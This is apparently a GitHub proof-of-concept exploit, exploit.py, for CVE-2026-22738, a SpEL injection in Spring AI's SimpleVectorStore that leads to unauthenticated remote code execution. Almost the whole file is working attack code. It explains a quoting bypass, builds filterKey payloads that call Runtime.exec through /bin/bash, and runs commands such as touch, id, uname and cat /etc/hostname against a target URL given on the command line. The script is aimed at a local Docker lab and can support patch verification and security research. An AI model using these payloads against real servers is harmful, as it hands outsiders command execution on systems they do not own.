5465 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / exploit.py PY
#!/usr/bin/env python3
"""
CVE-2026-22738 — SpEL Injection RCE in Spring AI SimpleVectorStore
CVSS 9.8 CRITICAL | CWE-94 / CWE-917
Affected: org.springframework.ai:spring-ai-core 1.0.0–1.0.4, 1.1.0-M1–1.1.3
Fixed:    Spring AI 1.0.5 / 1.1.4 (commit ba9220b22383e430d5f801ce8e4fa01cf9e75f29)

Technique
─────────
SimpleVectorStore.similaritySearch() passes the user-supplied filter key name
verbatim into a SpEL template evaluated by StandardEvaluationContext.
StandardEvaluationContext exposes the full JVM reflection API, so injecting
    T(java.lang.Runtime).getRuntime().exec(...)
into the filter key achieves unauthenticated OS command execution.

Key bypass detail (from exploit research):
  • Naïve single-quote injection fails because the filter text parser treats
    a key starting with ' as a quoted string and strips the outer quotes.
  • Wrapping the payload in double quotes ("...") causes the parser to strip
    the outer double quotes, leaving the inner content (starting/ending with ')
    to be used verbatim as the SpEL key via #metadata['<KEY>'].
  • Using #metadata[''] on both sides (instead of undefined foo[...]) avoids
    an "unknown variable" SpEL error while still triggering exec().

Success indicator:
  • HTTP response body contains "EL1030E" — the SpEL runtime error
    "operator ADD not supported between null and java.lang.ProcessImpl".
    This error is raised AFTER exec() returns, confirming OS-level execution.

Usage
─────
  pip install requests
  python3 exploit.py [--target http://localhost:8082]

For Docker Desktop (macOS/Windows) callback payloads, use host.docker.internal
instead of 127.0.0.1 as the callback IP.
"""

import argparse
import subprocess
import sys
import time

try:
    import requests
except ImportError:
    print("[!] Missing dependency — run: pip install requests")
    sys.exit(1)

# ── Constants ──────────────────────────────────────────────────────────────────
CONTAINER_NAME = "cve-2026-22738-lab"   # must match docker-compose container_name
PROOF_FILE     = "/tmp/pwned_cve_2026_22738"
RCE_PROOF_FILE = "/tmp/rce_proof.txt"
# SpEL error raised after exec() returns — reliable OOB-free confirmation of RCE
RCE_INDICATOR  = "EL1030E"

BANNER = """
╔══════════════════════════════════════════════════════════════════╗
║  CVE-2026-22738 — Spring AI SpEL Injection → RCE               ║
║  CVSS 9.8 CRITICAL  |  No Auth  |  No Interaction               ║
║  Affected: Spring AI SimpleVectorStore 1.0.0–1.0.4             ║
╚══════════════════════════════════════════════════════════════════╝"""


# ── Payload helpers ────────────────────────────────────────────────────────────

def spel_filter_key(cmd: str) -> str:
    """
    Build the SpEL injection filterKey parameter value.

    The application concatenates filterKey into the filter expression string:
        filterExpr = filterKey + " == '" + filterValue + "'"

    With our payload the expression becomes:
        "'] + T(java.lang.Runtime).getRuntime().exec(new String[]{...}) + #metadata['" == 'x'

    The filter text parser strips the outer double-quotes and passes the inner
    content to doKey(), which embeds it into:
        #metadata[''] + T(java.lang.Runtime)...exec(...) + #metadata[''] == 'x'

    StandardEvaluationContext evaluates this, exec() fires, then SpEL throws
    EL1030E (can't ADD null + ProcessImpl) — that error is our success indicator.

    IMPORTANT: cmd must not contain single quotes (they would break the SpEL string).
    For commands with single-quoted arguments, base64-encode and decode inline.
    """
    return (
        f'''"'] + T(java.lang.Runtime).getRuntime().exec('''
        f'''new String[]{{'/bin/bash','-c','{cmd}'}}) + #metadata['"'''
    )


def spel_read_property(prop: str) -> str:
    """Blind probe payload — reads a JVM system property (no OS exec needed)."""
    return f'''"'] + T(java.lang.System).getProperty('{prop}') + #metadata['"'''


# ── Individual exploit steps ───────────────────────────────────────────────────

def step_baseline(session: requests.Session, target: str) -> bool:
    """Step 1 — confirm the endpoint is reachable and the seeded document is returned."""
    print("\n[*] Step 1 — Baseline check (filterKey=country, filterValue=US)")
    try:
        resp = session.get(
            f"{target}/search",
            params={"filterKey": "country", "filterValue": "US", "query": "hello"},
            timeout=15,
        )
    except requests.ConnectionError as e:
        print(f"    ✗ Connection refused: {e}")
        return False

    if resp.status_code == 200 and ("country" in resp.text or "US" in resp.text or "Hello" in resp.text):
        print(f"    ✓ Endpoint reachable — seeded document returned (HTTP {resp.status_code})")
        return True

    print(f"    ✗ Unexpected response (HTTP {resp.status_code}): {resp.text[:300]}")
    return False


def step_spel_probe(session: requests.Session, target: str) -> bool:
    """Step 2 — blind SpEL probe to confirm the injection point is reached."""
    print("\n[*] Step 2 — SpEL probe (read java.version via T(java.lang.System))")
    payload = spel_read_property("java.version")
    resp = session.get(
        f"{target}/search",
        params={"filterKey": payload, "filterValue": "x", "query": "hello"},
        timeout=15,
    )
    # SpEL evaluation error (500) or clean response (200) — both confirm evaluation happened
    if resp.status_code in (200, 500):
        print(f"    ✓ SpEL expression reached the evaluator (HTTP {resp.status_code})")
        if "21" in resp.text or "17" in resp.text or "java" in resp.text.lower():
            print(f"    ✓ Java version string visible in response body")
        return True
    print(f"    ? Unexpected status {resp.status_code}: {resp.text[:200]}")
    return False


def step_rce_touch(session: requests.Session, target: str) -> bool:
    """Step 3 — RCE: create /tmp/pwned_cve_2026_22738 inside the container."""
    print(f"\n[*] Step 3 — RCE: touch {PROOF_FILE}")
    cmd  = f"touch {PROOF_FILE}"
    resp = session.get(
        f"{target}/search",
        params={"filterKey": spel_filter_key(cmd), "filterValue": "x", "query": "hello"},
        timeout=15,
    )
    if RCE_INDICATOR in resp.text:
        print(f"    ✓ {RCE_INDICATOR} in response — Runtime.exec() was invoked (process spawned)")
        return True
    print(f"    ? Response (HTTP {resp.status_code}): {resp.text[:300]}")
    # Still return True if we get a 500 with any error — execution may have happened
    return resp.status_code == 500


def step_rce_id(session: requests.Session, target: str) -> bool:
    """Step 4 — RCE: write id/uname/hostname to /tmp/rce_proof.txt."""
    print(f"\n[*] Step 4 — RCE: capture id + uname + hostname → {RCE_PROOF_FILE}")
    # Chained commands — must not use single quotes inside the payload
    cmd = (
        f"id > {RCE_PROOF_FILE} && "
        f"uname -a >> {RCE_PROOF_FILE} && "
        f"cat /etc/hostname >> {RCE_PROOF_FILE}"
    )
    resp = session.get(
        f"{target}/search",
        params={"filterKey": spel_filter_key(cmd), "filterValue": "x", "query": "hello"},
        timeout=15,
    )
    if RCE_INDICATOR in resp.text:
        print(f"    ✓ {RCE_INDICATOR} detected — command dispatched")
        return True
    print(f"    ? HTTP {resp.status_code}: {resp.text[:200]}")
    return False


def step_verify_docker() -> bool:
    """Step 5 — read proof files from inside the container via docker exec."""
    print("\n[*] Step 5 — Verifying via docker exec")
    time.sleep(1)   # give the spawned bash process a moment to finish writing

    # ── Check the touch file ──────────────────────────────────────────────────
    try:
        r = subprocess.run(
            ["docker", "exec", CONTAINER_NAME, "ls", "-la", PROOF_FILE],
            capture_output=True, text=True, timeout=10,
        )
        if r.returncode == 0:
            print(f"    ✓ Proof file present: {r.stdout.strip()}")
        else:
            print(f"    ✗ Proof file missing: {r.stderr.strip()}")
    except FileNotFoundError:
        print("    ! 'docker' binary not in PATH — skipping file check")
        return False
    except subprocess.TimeoutExpired:
        print("    ! docker exec timed out")
        return False

    # ── Read id / uname output ────────────────────────────────────────────────
    try:
        r = subprocess.run(
            ["docker", "exec", CONTAINER_NAME, "cat", RCE_PROOF_FILE],
            capture_output=True, text=True, timeout=10,
        )
        if r.returncode == 0 and r.stdout.strip():
            print(f"\n{'='*62}")
            print("    RCE PROOF (executed inside the container):")
            print(f"{'='*62}")
            for line in r.stdout.strip().splitlines():
                print(f"    {line}")
            print(f"{'='*62}")
            return "uid=" in r.stdout
        else:
            print(f"    ✗ Could not read {RCE_PROOF_FILE}: {r.stderr.strip()}")
            return False
    except subprocess.TimeoutExpired:
        print("    ! docker exec timed out while reading proof file")
        return False


# ── Main ───────────────────────────────────────────────────────────────────────

def wait_for_ready(target: str, timeout_s: int = 120) -> bool:
    """Poll /search?filterKey=country&filterValue=US until the app responds (or timeout)."""
    deadline = time.time() + timeout_s
    print(f"[*] Waiting for app to be ready at {target} (up to {timeout_s}s) …", end="", flush=True)
    while time.time() < deadline:
        try:
            r = requests.get(
                f"{target}/search",
                params={"filterKey": "country", "filterValue": "US"},
                timeout=5,
            )
            if r.status_code in (200, 500):
                print(" ready!")
                return True
        except Exception:
            pass
        print(".", end="", flush=True)
        time.sleep(3)
    print(" TIMEOUT")
    return False


def main():
    parser = argparse.ArgumentParser(
        description="CVE-2026-22738 PoC — SpEL RCE in Spring AI SimpleVectorStore"
    )
    parser.add_argument(
        "--target",
        default="http://localhost:8082",
        help="Base URL of the vulnerable app (default: http://localhost:8082). "
             "Inside Docker use http://host.docker.internal:8082",
    )
    parser.add_argument(
        "--wait", action="store_true",
        help="Poll the target until it is ready before exploiting (useful right after 'docker compose up')",
    )
    args = parser.parse_args()

    target = args.target.rstrip("/")
    print(BANNER)
    print(f"Target: {target}\n")

    session = requests.Session()

    if args.wait:
        if not wait_for_ready(target):
            print("[!] Target never became ready. Exiting.")
            sys.exit(1)

    # ── Run steps ─────────────────────────────────────────────────────────────
    if not step_baseline(session, target):
        print("\n[!] Baseline failed — is the container running?")
        print(f"    Try: docker compose up -d --build   (then retry with --wait)")
        sys.exit(1)

    step_spel_probe(session, target)

    rce_ok = step_rce_touch(session, target)

    step_rce_id(session, target)

    verified = step_verify_docker()

    # ── Final verdict ─────────────────────────────────────────────────────────
    print()
    if rce_ok and verified:
        print("✅  EXPLOIT SUCCEEDED — full unauthenticated RCE confirmed (running as root)")
    elif rce_ok:
        print("⚠️   EXPLOIT LIKELY SUCCEEDED — EL1030E received but docker verify was skipped")
        print(f"     Manual check: docker exec {CONTAINER_NAME} cat {RCE_PROOF_FILE}")
    else:
        print("❌  EXPLOIT FAILED — check that the target is running Spring AI 1.0.0–1.0.4")


if __name__ == "__main__":
    main()